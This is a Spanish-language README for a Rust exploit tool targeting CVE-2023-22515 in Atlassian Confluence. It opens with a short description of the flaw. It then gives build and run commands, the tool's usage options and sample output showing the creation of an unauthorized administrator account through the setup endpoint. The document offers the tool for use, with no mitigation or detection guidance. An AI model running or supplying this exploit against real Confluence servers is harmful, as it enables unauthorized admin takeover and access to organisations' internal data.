
Exploit basado en Rust para CVE-2023-22515 que crea cuentas de administrador no autorizadas en Confluence Server y Data Center mediante un control de acceso roto.
Confluence es una wiki empresarial basada en web desarrollada por la empresa australiana de software Atlassian. Atlassian ha sido informada de un problema reportado por algunos clientes donde atacantes externos pueden haber explotado una vulnerabilidad previamente desconocida en servidores Confluence y centros de datos de acceso público para crear cuentas de administrador de Confluence no autorizadas y acceder a instancias de Confluence.
La vulnerabilidad ha sido clasificada como CVE-2023-22515
Primero realice la compilación con el comando:
cargo build --release
Puede hacerlo de estas dos maneras:
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
Esto mostrará la ayuda de la herramienta. Aquí están todos los parámetros que soporta:
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!